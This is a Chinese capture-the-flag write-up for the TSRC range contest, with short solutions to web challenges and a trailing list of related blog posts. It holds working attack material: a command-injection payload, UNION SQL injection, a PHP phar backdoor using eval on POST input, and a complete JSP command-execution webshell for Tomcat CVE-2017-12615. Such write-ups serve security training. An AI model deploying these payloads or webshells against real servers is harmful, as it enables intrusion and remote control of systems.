TSRC靶场赛-writeup
签到
文件上传JS验证,抓包or禁用JS
命令执行基础
啥都没过滤
payload:127.0.0.1|cat ../key.php
你能爆破吗
根据hint,爆破得到用户名admin、密码admin
再根据hint的cookie注入,继续判断字段、爆库、爆表、爆字段,得到flag
中间需要base64编码
成绩查询
union注入,同上
payload:-1' union select 1,2,3,flag from fl4g#
文件包含GetShell
文件上传点只能上传txt,再根据hint文件包含phar,就知道又是很简单的一个题目了,上传一个有后门的phar文件,扩展名改成.txt,然后phar文件包含就好了,连接,得到flag
生成phar文件
<?php$p = new Phar("my.phar", 0, 'my.phar');$p->startBuffering();$p['shell.php'] = '<?php phpinfo(); eval($_POST[x]); ?>';$p->setStub("<?phpPhar::mapPhar('myphar.phar'); __HALT_COMPILER();");$p->stopBuffering();
?>
payload:http://dd5ae31d.yunyansec.com/lfi.php?file=phar://files/JSWOJf0mA0u3Aiyd.txt/shell
小猫咪踩灯泡
根据hint的tomcat远程代码执行(CVE-2017-12615),百度得到了exp,照葫芦画瓢
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();
}%>
<%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{out.println(":-)");
}%>
TSRC靶场赛-writeup相关推荐
- 3G0众测靶场-0407 WriteUp
0x01 前言 昨天参加了3G0众测的题目,一直没来得及更新题目,今天的话看JC师傅整理了一下,我这边也来凑下热闹.内容挺基础,但是对一些CMS类型和框架不熟悉的话,就很容易走偏路,经常看响应包,还有 ...
- “蚁景杯”WUSTCTF2021新生赛writeup
"蚁景杯"WUSTCTF2021新生赛writeup Crypto 签到 滴答 AES With RSA GMC Vigenere give you d 银河信号 Misc Erx ...
- 20年9月wust招新赛writeup
20年9月wust招新赛writeup Crypto 黑铁2 黑铁1 青铜3 青铜5 白银5 黄金3 黄金2 Misc 黑铁3 白银3 铂金3 黄金1 铂金2 Web 青铜2 青铜1 白银3 白银2 ...
- [完整]首届盘古石杯电子数据取证大赛晋级赛Writeup
首届盘古石电子数据取证大赛晋级赛Writeup 致谢 湖南警察学院-雷波(https://mp.weixin.qq.com/s/KyeHWgnfRdR0yUZm9PUYhQ) 浙江警察学院-Zodi4 ...
- 长安“战疫”网络安全卫士守护赛writeup
长安"战疫"网络安全卫士守护赛writeup misc 八卦迷宫 得到flag cazy{zhanchangyangchangzhanyanghechangshanshananzh ...
- PWNHUB 五月公开赛+内部赛 writeup(【5月公开赛】MyNotes TemplatePlay 【胖哈勃内部赛|五月,你好】MockingMail)
PWNHUB 五月公开赛+内部赛 writeup [5月公开赛]MyNotes [5月公开赛]TemplatePlay [胖哈勃内部赛|五月,你好!]MockingMail [胖哈勃内部赛|五月,你好 ...
- 2020 第三届江西省高校网络安全技能大赛 线上赛Writeup
赛题类型 Misc Misc1-Hello Misc2-encrypt Misc3-jump Misc4-Burps Misc5-Trees Misc6-qrcode Misc7-blind Misc ...
- 2021第四届红帽杯网络安全大赛-线上赛Writeup
文章目录 MISC 签到 colorful code WEB find_it framework WebsiteManger ezlight 记录一下被锤爆的一天-orz MISC 签到 签到抢了个二 ...
- Dest0g3 520迎新赛 writeup (misc部分 + web部分)
Dest0g3 520迎新赛 文章目录 Dest0g3 520迎新赛 MISC Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius Ea ...
- 2019年第十二届全国大学生信息安全实践创新赛线上赛Writeup
本文章来自https://www.cnblogs.com/iAmSoScArEd/p/10780242.html 未经允许不得转载! 1.MISC-签到 下载附件后,看到readme.txt打开后提 ...
最新文章
- NSThread Run Loop
- Pytorch使用TensorboardX进行网络可视化
- 流媒体技术学习笔记之(十八)Ubuntu 16.04.3 如何编译 FFmpeg 记录
- java keytool 导入证书_java - Keytool无法导入证书 - SO中文参考 - www.soinside.com
- greenplum 查询出来的数字加减日期_mysql与时间有关的查询
- docker开启远程访问_Ubuntu安装Jupyter notebook——开启远程访问
- Bootstrap css3
- leetcode--70. 爬楼梯
- iphone内关于sqlite开发的相关教程
- 广发银行创新“智慧金融”打造“智慧城市”
- js基础-9-正则表达式
- Linux命令之iconv命令
- 《电路》邱关源 思维导图 第七章-一阶和二阶电路的时域分析
- Flutter 实现 仿Android原生启动模式SingleTask
- ZigBee中协调器如何向子节点发消息?
- Shiro安全框架的原理及实现步骤
- 华为员工吐槽加班太多,晒出7天上班打卡记录网友:不怕猝死吗?
- 计算机文档排版的心得体会,排版工作心得体会(共6篇) .docx
- 第五篇:手把手教你移植任天堂,没有声音、无需外置SD卡、可使用独立按键也可使用外置手柄,本人使用的芯片为ESP32,移植到STM32均可使用。(本篇完结nes模拟器的移植)
- jupyter报错EnvironmentLocationNotFound: Not a conda environment: /root/anaconda3/envs/anaconda3